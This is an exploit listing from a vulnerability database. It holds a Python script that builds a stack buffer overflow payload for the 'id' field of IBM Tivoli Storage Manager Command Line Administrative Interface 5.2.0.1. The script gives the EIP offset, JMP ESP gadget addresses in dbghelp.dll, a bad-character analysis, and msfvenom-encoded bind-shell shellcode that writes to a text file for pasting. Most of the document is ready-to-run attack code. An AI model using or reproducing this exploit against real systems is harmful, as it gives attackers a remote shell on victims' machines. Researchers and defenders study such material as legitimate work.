Vulners
Lucene search
IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - Buffer Overflow Exploit
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
"""
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
FileName : dsmadmc.exe
ARCH : I386
DotNET : False
ASLR : True
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : False
ControlFlowGuard : False
HighentropyVA : False
"""
# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
# ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""
#!/usr/bin/python
import struct
# 4000 bytes
buff_max_length=800
eip_offset=68
"""
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
GOOD CHARS:
asciiprint \x20-\x7e
MOD CHARS:
\x00 -> \x20
,-----------------------------------------------.
| Comparison results: |
|-----------------------------------------------|
| 80 81 82 83 84 85 86 87| File
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
f0 |f8 f9 fa fb fc fd fe ff | File
|6f 97 a3 96 81 79 5f 98 | Memory
`-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))
print("Writing {} bytes".format(len(buff)))
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Nov 2020 00:00Current
1Low risk
Vulners AI Score1